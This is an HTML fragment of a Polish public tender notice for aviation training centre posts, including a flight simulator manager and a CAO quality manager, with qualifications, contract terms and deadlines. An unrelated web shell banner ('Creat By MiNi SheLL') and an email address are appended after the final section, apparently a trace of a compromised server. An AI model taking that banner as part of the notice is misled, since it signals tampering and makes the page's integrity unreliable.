obowiązujących przepisów prawa lotniczego;<br/>­	Wykonawca, składając ofertę jednocześnie oświadcza, że:<br/>•	znany mu jest zakres i charakter zadań realizowanych w AOSL POLSL, opisanych <br/>w SWZ;<br/>•	wykonywanie przez niego zadań w innych podmiotach (ATO, przewoźnik lotniczy, itp.) nie będzie kolidowało z realizacją zadań w AOSL POLSL. <br/>-	Wykonawca zobowiązany jest do opracowania Raportu z realizacji zadań w miesiącu. W raporcie należy wykazać zadania, oraz terminy, w których były wykonywane. Raport stanowi załącznik do FV/rachunku i podlega zatwierdzeniu przez Kierownika Szkolenia Ośrodka (HT). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79420000-4 - Usługi związane z zarządzaniem</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72224200-3 - Usługi w zakresie planowania zapewniania jakości systemu</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kierownik Szkoleniowego Urządzenia Symulacji Lotu<br/>Zakres czynności na stanowisku Kierownika Szkoleniowego Urządzenia Symulacji Lotu:<br/>	realizacja prób subiektywnych i obiektywnych Szkoleniowego Urządzenia Symulacji Lotu;<br/>	wykonywanie czynności służbowych na terenie Ośrodka w wymiarze minimum 80 godzin, <br/>w miesiącu;<br/>	realizacja szkoleń symulatorowych zleconych przez Szefa Instruktorów Szkolenia Praktycznego;<br/>	prowadzenie praktycznego szkolenia naziemnego, na symulatorze lotu zgodnie <br/>z zapisami obowiązujących przepisów lotniczych oraz zapisami dokumentów regulaminowych i programów szkolenia Ośrodka Szkolenia Lotniczego;<br/>	prowadzenie zajęć teoretycznych w ramach szkolenia symulatorowego wraz z związaną <br/>z nimi dokumentacją, zgodnie z planem, programem opracowanym przez Kierownika Szkolenia;<br/>	wykonywanie czynności związanych z kontrolą i nadzorem poziomu i jakości wyszkolenia podległych uczniów-pilotów;<br/>	nadzór nad procesem przygotowania i kontrola procesu przygotowywania się uczniów-pilotów do realizacji lotów symulatorowych;<br/>	prowadzenie briefingów i debriefingów z uczniami-pilotami przydzielonymi do szkolenia;<br/>	realizowanie czynności związanych z kontrolą prawidłowego prowadzenia osobistej dokumentacji lotniczej przez uczniów-pilotów;<br/>	uczestniczenie w procesie przygotowywania tematów prac kontrolnych, testów (KWT) zgodnie z zaleceniami i postanowieniami Kierownika Szkolenia;<br/>	prowadzenie dokumentacji planistycznej i dbanie o wpisy w karcie przebiegu szkolenia ucznia-pilota i zapisywanie lotów symulatorowych w systemie elektronicznym;<br/>	zgłaszanie do Kierownika Szkolenia wniosków w zakresie przebiegu szkolenia podległych uczniów-pilotów, w tym, dotyczących postępów w szkoleniu, stanu dyscypliny, wniosków dotyczących dalszego szkolenia;<br/>	przestrzeganie norm czasowych w zakresie czasu wykonywania czynności lotniczych, tj.: czasu pracy i czasu wypoczynku;<br/>	powstrzymywanie się od wykonywania czynności instruktorskich w przypadku uzasadnionych wątpliwości , wg własnej oceny, posiadanej wiedzy i umiejętności, co do możliwości bezpiecznej ich realizacji w określonych warunkach oraz powiadamianie o tym fakcie Kierownika Szkolenia;<br/>	powstrzymywanie się od wykonywania czynności instruktorskich, wykonywania lotów <br/>i uczestniczenia w ćwiczeniach naziemnych z wykorzystaniem statków powietrznych, <br/>w przypadkach wystąpienia niedyspozycji fizycznych i/lub psychicznych (alkohol, środki odurzające, leki ograniczające sprawność fizyczną i psychiczną) oraz powiadamianie Kierownika Szkolenia o zaistniałej sytuacji;<br/>­	Wykonawca, składając ofertę jednocześnie oświadcza, że:<br/>•	znany mu jest zakres i charakter zadań realizowanych w AOSL POLSL, opisanych <br/>w SWZ;<br/>•	wykonywanie przez niego zadań lotniczych w innych podmiotach (ATO, przewoźnik lotniczy, itp.) nie będzie kolidowało z realizacją zadań w AOSL POLSL. <br/>­	Wykonawca zobowiązany jest do opracowania Raportu z realizacji zadań w miesiącu. <br/>W raporcie należy wykazać zadania, oraz terminy, w których były wykonywane. Raport stanowi załącznik do FV/rachunku i podlega zatwierdzeniu przez Kierownika Szkolenia Ośrodka (HT). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79420000-4 - Usługi związane z zarządzaniem</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72224200-3 - Usługi w zakresie planowania zapewniania jakości systemu</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kierownik Jakości Organizacji Kompleksowej Zdatności do Lotu (CAO) <br/>Zakres czynności na stanowisku Kierownika Jakości (CAO)<br/>	kontrola i ocena kompetencji i kwalifikacji personelu CAO;<br/>	monitorowanie czy wszystkie czynności Zarządzania Ciągłą Zdatnością do Lotu są wykonywane zgodnie z zatwierdzonymi procedurami;<br/>	monitorowanie zgodności działania organizacji z wymaganiami EASA Part-M i Part-145 poprzez systematyczne wykonywanie audytów i inspekcji;<br/>	opracowanie i wdrażanie programu jakości w obszarze systemu zarządzania ciągłą zdatnością do lotu statków powietrznych;<br/>	opracowanie List Kontrolnych na potrzeby realizacji audytów wewnętrznych w organizacji CAO;<br/>	opracowywanie raportów z przeprowadzonych audytów;<br/>	składanie raportów do Kierownika Odpowiedzialnego o stanie systemu jakości w organizacji;<br/>	przedstawianie Kierownikowi Odpowiedzialnemu półrocznych raportów z oceny działania systemu jakości w organizacji CAO;<br/>	wnioskowanie o przeprowadzenie działań korygujących i naprawczych;<br/>	inicjowanie o nadzorowanie wprowadzania działań korygujących i naprawczych;<br/>	nadzorowanie usuwania niezgodności wynikających z systemu audytów wewnętrznych <br/>i bieżącego nadzoru prowadzonego przez ULC;<br/>	Kierownik Jakości CAO podlega bezpośrednio Kierownikowi Odpowiedzialnemu;<br/>­	Wykonawca, składając ofertę jednocześnie oświadcza, że:<br/>•	znany mu jest zakres i charakter zadań realizowanych w AOSL POLSL, opisanych <br/>w SWZ;<br/>•	wykonywanie przez niego zadań w innych podmiotach (ATO, przewoźnik lotniczy, itp.) nie będzie kolidowało z realizacją zadań w AOSL POLSL. <br/>-	Wykonawca zobowiązany jest do opracowania Raportu z realizacji zadań w miesiącu. W raporcie należy wykazać zadania, oraz terminy, w których były wykonywane. Raport stanowi załącznik do FV/rachunku i podlega zatwierdzeniu przez Kierownika Szkolenia Ośrodka (HT). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79420000-4 - Usługi związane z zarządzaniem</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72224200-3 - Usługi w zakresie planowania zapewniania jakości systemu</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dysponowanie minimum 1 osobą (dla każdej części zamówienia) zdolną do wykonania zamó-wienia, która będzie je wykonywała (wyznaczoną do realizacji zamówienia) i która będzie od-powiedzialna m. in. za prawidłową realizację zamówienia i jakość jego wykonania, oraz posia-da/spełnia następujące kwalifikacje, uprawnienia i doświadczenie:<br/><br/>Szef Instruktorów Szkolenia Praktycznego CFI musi:<br/>	spełniać wymagania dla CFI zawarte w PART-ORA oraz AMC i GM do PART-ORA;<br/>	posiadać licencję pilota samolotowego wydaną zgodnie z przepisami EASA minimum CPL(A);<br/>	posiadać uprawnienie IR SE/ME, MEP(L), FI(A) do CPL/IR/ME;<br/>	posiadać orzeczenie lotniczo-lekarskie gr. 1;<br/>	posiadać potwierdzoną znajomość języka angielskiego na poziomie minimum 4 ICAO;<br/>	posiadać nalot ogólny minimum 2000 godzin;<br/>	posiadać doświadczenie w pracy w charakterze personelu nominowanego ośrodka szkolenia lotniczego lub podmiocie o charakterze lotniczym.<br/><br/>Szef Instruktorów Szkolenia Teoretycznego CTKI musi:<br/>	spełniać wymagania dla CTKI zawarte w PART-ORA oraz AMC i GM do PART-ORA;<br/>	posiadać licencję pilota samolotowego wydaną zgodnie z przepisami EASA ATPL(A);<br/>	posiadać uprawnienie IR SE/ME, MEP(L), FI(A) do CPL/IR/ME;<br/>	posiadać orzeczenie lotniczo-lekarskie gr. 1;<br/>	posiadać potwierdzoną znajomość języka angielskiego na poziomie minimum 4 ICAO;<br/>	posiadać nalot ogólny minimum 1.500 godzin;<br/>	posiadać doświadczenie w pracy w charakterze personelu nominowanego ośrodka szkolenia lotniczego lub podmiocie o charakterze lotniczym.<br/><br/>Kierownik ds. Procedur i Projektów Lotniczych KPPL musi posiadać:<br/>	wykształcenie wyższe techniczne o profilu lotniczym;<br/>	aktualne lub wygasłe uprawnienia lotnicze;<br/>	znajomość przepisów i procedur w zakresie Ustawy – Prawo zamówień publicznych;<br/>	doświadczenie w opracowywaniu dokumentacji związanej z realizacją przetargów oraz projektów;<br/>	biegłą znajomość przepisów Part-FCL oraz dokumentów normatywnych dotyczących funkcjonowania lotnictwa (dokumenty UE, EASA, ULC);<br/>	umiejętność interpretacji przepisów lotniczych;<br/>	doświadczenie w pracy w charakterze personelu nominowanego ośrodka szkolenia lot-niczego lub podmiocie o charakterze lotniczym.<br/><br/>Kierownik Jakości Part-147 musi posiadać:<br/>	wykształcenie wyższe techniczne;<br/>	znajomość technik audytowania organizacji o charakterze lotniczym;<br/>	doświadczenie w wykonywaniu audytów jakości w obszarach funkcjonowania uznanej organizacji szkoleniowej;<br/>	znajomość techniki i środowiska lotniczego, wiedza z zakresu komercyjnego transportu lotniczego;<br/>	znajomość przepisów Part-66 i Part-147;<br/>	umiejętność interpretacji przepisów lotniczych;<br/>	doświadczenie w pracy w charakterze personelu nominowanego ośrodka szkolenia lot-niczego lub podmiocie o charakterze lotniczym.<br/><br/>Kierownik Szkoleniowego Urządzenia Symulacji Lotu musi posiadać:<br/>	licencję pilota samolotowego wydaną zgodnie z przepisami EASA minimum CPL(A);<br/>	uprawnienia do prowadzenia szkoleń na szkoleniowych urządzeniach symulacji lotu IR i/lub MCC; <br/>	potwierdzoną znajomość języka angielskiego na poziomie minimum 4 ICAO;<br/>	znajomość dokumentów normatywnych dot. realizacji zadań szkolenia lotniczego;<br/>	umiejętność opracowywania dokumentów sprawozdawczych dot. szkolenia lotniczego;<br/>	doświadczenie w pracy w charakterze personelu nominowanego ośrodka szkolenia lot-niczego lub podmiocie o charakterze lotniczym.<br/><br/>Kierownik Jakości Organizacji Kompleksowej Zdatności do Lotu CAO musi posiadać:<br/>	wykształcenie wyższe techniczne;<br/>	doświadczenie w wykonywaniu audytów jakości w obszarach zarządzania zdatnością do lotu lub/i obsługi technicznej samolotów;<br/>	znajomość techniki i środowiska lotniczego, wiedza z zakresu komercyjnego transportu lotniczego;<br/>	znajomość przepisów Part-M i Part-145;<br/>	umiejętność interpretacji przepisów lotniczych;<br/>	posługiwanie się dokumentacją techniczną statków powietrznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału<br/>w postępowaniu, Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Zgodnie z art. 127 ust. 2 ustawy Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych,<br/>które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność. Zgodnie z art. 274 ust. 4<br/>ustawy Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17<br/>lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1, dane umożliwiające dostęp do tych środków.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Do oferty należy dołączyć stosowne pełnomocnictwo do reprezentowania ww. wykonawców, które powinno być przez nich udzielone (podpisane). Jeżeli została wybrana oferta wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. Wykonawcy składający ofertę wspólną ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, z którego wynika, które usługi wykonają poszczególni wykonawcy. Każdy z wykonawców występujących wspólnie musi z osobna wykazać brak podstaw wykluczenia z postępowania o udzielenie zamówienia.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 5.5.) niniejszego ogłoszenia składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdzać ma brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na mocy art. 455 ust. 1 pkt 1) ustawy Zamawiający przewiduje następujące zmiany postanowień zawartej umowy:<br/>1) zmiany strony umowy w przypadku następstwa prawnego wynikającego z odrębnych przepisów,<br/>2) zmiany terminu lub sposobu wykonania umowy w przypadku:<br/>a) wystąpienia zdarzeń siły wyższej – o czas trwania przeszkody; w rozumieniu niniejszej umowy „siła wyższa” jest to<br/>zdarzenie nadzwyczajne, zewnętrzne wobec stron i niemożliwe do zapobieżenia, którego nie udało się uniknąć nawet w<br/>wypadku maksymalnej staranności stron; strona powołująca się na stan siły wyższej jest zobowiązana do niezwłocznego<br/>pisemnego powiadomienia drugiej strony, a następnie do udokumentowania zaistnienia tego stanu; obie strony będą<br/>zwolnione od odpowiedzialności za niewykonanie umowy, nienależyte wykonanie lub zwłokę w wykonaniu umowy, w takim<br/>zakresie, w jakim nastąpiło to na skutek zdarzeń siły wyższej,<br/>b) wystąpienia okoliczności leżących po stronie Zamawiającego lub niezawinionych przez Wykonawcę, uniemożliwiających<br/>rozpoczęcie, realizację w terminie lub kontynuowanie realizacji przedmiotu umowy,<br/>c) w przypadku niewyczerpania ceny umowy, o której mowa w § 2 ust. 1, Zamawiający przewiduje możliwość wydłużenia<br/>terminu realizacji umowy o maksymalnie 3 miesiące,<br/>3) zmiany w kolejności i terminach płatności, w przypadku zmiany terminu lub sposobu realizacji zamówienia,<br/>4) zmiany sposobu wykonywania umowy:<br/>a) spowodowanych siłą wyższą w rozumieniu ust. 3 pkt 2) lit. a), uniemożliwiającą wykonanie umowy zgodnie z jej<br/>postanowieniami,<br/>b) w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć<br/>w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności<br/>i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony umowy, c) w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa, w tym prawa miejscowego w zakresie<br/>mającym wpływ na realizację przedmiotu umowy,<br/>5) zmiany ceny umowy w przypadku zmiany stawki podatku VAT,<br/>6) Zamawiający dopuszcza możliwość wydłużenia terminu realizacji umowy o maksymalnie 3 miesiące w przypadku<br/>wystąpienia niekorzystnych zjawisk pogodowych, tj. mgły, oblodzenia, które uniemożliwiają wykonywanie<br/>lotów. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę i nie<br/>stanowią zobowiązania Zamawiającego do wyrażenia takiej zgody.<br/>7) Zamawiający przewiduje możliwość wprowadzania zmian wysokości wynagrodzenia należnego Wykonawcy (waloryzacji),<br/>w przypadku zmiany kosztów związanych z realizacją zamówienia, zgodnie z poniższymi zasadami:<br/>a) Wykonawca może w trakcie trwania umowy, po upływie 6 miesięcy jej realizacji, jednorazowo na podstawie art. 439<br/>ustawy Pzp złożyć wniosek o zmianę wysokości należnego wynagrodzenia (dalej: wniosek), jeśli obliczony zgodnie z<br/>poniższą lit. b) wskaźnik waloryzacyjny WW przewyższy 0;<br/>b) waloryzacja dotyczy usług niezafakturowanych i wykonywanych począwszy od miesiąca, w którym został złożony<br/>wniosek, w oparciu o wskaźnik waloryzacyjny wyliczony według wzoru:<br/>(...) UWAGA! Ze względu na ograniczoną liczbę znaków możliwych do wpisania w niniejszym polu, pełny zakres zmian<br/>zawarty jest w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu wyłącznie za pośrednictwem Platformy Zakupowej. Instrukcja korzystania z Platformy jest dostępna w zakładce „Baza Wiedzy”. Nie dopuszcza się możliwości złożenia oferty za pośrednictwem poczty elektronicznej.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-24 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający przewiduje przesłanki wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r.<br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com